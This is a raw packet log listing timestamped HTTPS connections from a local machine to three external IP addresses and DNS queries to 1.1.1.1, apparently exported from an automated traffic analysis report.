                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932708025 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932738066 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932743073 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932784081 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932811022 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.932816029 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933573961 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933600903 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933614969 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933620930 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933667898 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.933725119 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934362888 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934390068 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934402943 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934408903 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934436083 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934437990 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934448004 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934484959 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.934490919 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.980940104 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:31.980961084 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019129992 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019165039 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019181967 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019196987 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019236088 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019248009 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019257069 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019287109 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019290924 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019299030 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019323111 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019404888 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019445896 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019452095 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019484997 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019490004 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019689083 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019732952 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019737959 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019764900 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019846916 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.019893885 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020095110 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020140886 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020379066 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020421028 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020524979 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020582914 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020592928 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020629883 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020673990 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.020713091 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021219015 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021265030 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021367073 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021410942 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021501064 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021542072 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021553040 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.021594048 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.105954885 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.105995893 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106019020 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106031895 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106041908 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106070995 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106086969 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106121063 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106129885 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106170893 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106195927 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106235981 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106551886 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106607914 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106679916 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106731892 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106803894 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.106848955 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107059956 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107122898 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107161999 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107206106 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107268095 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107328892 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107640982 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107693911 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107755899 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107800007 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.107980967 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108010054 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108035088 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108040094 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108052015 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108062029 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108083010 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108099937 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108685017 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108720064 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108799934 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108799934 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108808041 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108839989 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108882904 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108889103 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108899117 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108931065 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108957052 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108973026 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108979940 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.108990908 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109613895 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109668970 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109675884 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109752893 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109756947 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109764099 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109814882 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109961033 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.109994888 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110011101 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110016108 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110028028 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110043049 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110079050 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110083103 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.110131025 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362101078 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362117052 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362155914 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362180948 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362196922 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362214088 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362325907 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362345934 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362375021 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362380981 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362404108 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362864971 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362881899 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362922907 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.362935066 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363279104 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363301992 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363338947 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363344908 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363367081 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363487005 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363502026 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363524914 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363532066 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.363550901 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367352962 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367376089 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367413998 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367425919 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367454052 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367708921 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367726088 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367772102 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367779016 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.367799997 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368180990 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368196964 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368232012 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368240118 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368262053 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368777990 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368793011 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368829012 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368835926 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368859053 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368967056 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.368993044 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.369014025 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.369019032 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.369034052 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.369040012 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.369093895 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.382937908 CEST49709443192.168.2.8188.114.96.3
                                                                                                                                                                                                    Sep 30, 2024 18:25:32.382965088 CEST44349709188.114.96.3192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.128125906 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.128173113 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.128226042 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.131450891 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.131469011 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.800653934 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.800873041 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.803632975 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.803653002 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.803898096 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.844202995 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.866677046 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.907399893 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.520870924 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.520935059 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.520946026 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.520972967 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.520998955 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.521024942 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.521038055 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.521045923 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.521100998 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.521116972 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.562999964 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622006893 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622021914 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622045994 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622077942 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622113943 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622143030 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622159004 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.622179031 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.626774073 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.626866102 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.626877069 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.626921892 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.628209114 CEST49710443192.168.2.8104.102.49.254
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.628231049 CEST44349710104.102.49.254192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.657757998 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.657872915 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.657963037 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.658365011 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.658385038 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.151354074 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.151439905 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.153203964 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.153215885 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.153485060 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.154823065 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.154834032 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.154895067 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659127951 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659225941 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659315109 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659498930 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659498930 CEST49711443192.168.2.8104.21.84.213
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659547091 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:36.659575939 CEST44349711104.21.84.213192.168.2.8
                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.353456974 CEST6437953192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:28.364108086 CEST53643791.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.002553940 CEST5009753192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.013037920 CEST53500971.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.017153025 CEST5561753192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.025981903 CEST53556171.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.028835058 CEST6370853192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.038443089 CEST53637081.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.039669037 CEST6519653192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.051625013 CEST53651961.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.053128004 CEST5716253192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.064023972 CEST53571621.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.065314054 CEST5790353192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.075895071 CEST53579031.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.078527927 CEST5325653192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.089922905 CEST53532561.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.091139078 CEST6415653192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.100282907 CEST53641561.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.101466894 CEST5350253192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.110971928 CEST53535021.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.113493919 CEST4992153192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:34.122847080 CEST53499211.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.631908894 CEST5062353192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:25:35.656889915 CEST53506231.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:26:01.576402903 CEST5879753192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:26:01.644893885 CEST53587971.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:26:12.960388899 CEST4939953192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:26:12.968518972 CEST53493991.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:26:21.769926071 CEST5217753192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:26:22.118455887 CEST53521771.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:26:46.367573023 CEST6101853192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:26:46.377038956 CEST53610181.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:26:52.854583025 CEST6447553192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:26:52.862545013 CEST53644751.1.1.1192.168.2.8
                                                                                                                                                                                                    Sep 30, 2024 18:27:01.116763115 CEST5321253192.168.2.81.1.1.1
                                                                                                                                                                                                    Sep 30, 2024 18:27:01.129597902 CEST53532121.1.1.1192.168.2.8
